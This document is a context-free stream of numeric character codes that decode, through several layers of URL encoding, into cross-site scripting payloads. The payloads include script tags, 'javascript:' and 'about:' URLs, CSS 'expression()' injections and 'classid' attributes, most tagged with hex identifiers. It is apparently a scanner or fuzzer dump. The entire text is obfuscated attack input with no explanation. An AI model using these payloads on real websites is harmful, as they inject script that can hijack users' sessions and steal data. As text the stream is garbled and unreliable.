,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,48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4,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,54,54,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,54,50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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55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3,55,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,51,50,37,50,53,50,67,54,4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4,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,54,49,37,50,53,50,67,52,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,52,55,37,50,53,50,67,49,49,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56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4,37,50,53,50,67,54,53,37,50,53,50,67,56,57,37,50,53,50,67,54,57,37,50,53,50,67,56,50,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55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7,55,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,54,37,50,53,50,67,54,53,37,50,53,50,67,56,57,37,50,53,50,67,54,57,37,50,53,50,67,56,50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1,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,51,50,37,50,53,50,67,49,50,51,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,52,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49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1,52,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,53,37,50,53,50,67,55,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,55,54,37,50,53,50,67,55,51,37,50,53,50,67,54,50,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,5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57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,55,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,57,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,57,55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0,37,50,53,50,67,54,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,51,50,37,50,53,50,67,55,50,37,50,53,50,67,56,52,37,50,53,50,67,56,52,37,50,53,50,67,56,48,37,50,53,50,67,52,53,37,50,53,50,67,54,57,37,50,53,50,67,56,49,37,50,53,50,67,56,53,37,50,53,50,67,55,51,37,50,53,50,67,56,54,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,52,53,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,54,49,37,50,53,50,67,56,53,37,50,53,50,67,56,52,37,50,53,50,67,55,48,37,50,53,50,67,52,53,37,50,53,50,67,53,53,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,50,37,50,53,50,67,54,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,50,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,49,49,57,37,50,53,50,67,52,53,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,53,50,37,50,53,50,67,52,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,49,49,57,37,50,53,50,67,52,53,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,52,51,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,53,50,37,50,53,50,67,52,53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7,55,37,50,53,50,67,51,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50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1,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56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9,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,53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6,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56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6,37,50,53,50,67,49,50,51,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,49,50,53,37,50,53,50,67,53,5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1,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,49,50,53,37,50,53,50,67,53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7,55,37,50,53,50,67,51,50,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50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4,56,37,50,53,50,67,55,51,37,50,53,50,67,56,54,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,51,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,52,49,37,50,53,50,67,53,57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5,57,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,52,54,37,50,53,50,67,52,54,37,50,53,50,67,52,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,49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3,49,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55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3,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,50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1,51,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,53,37,50,53,5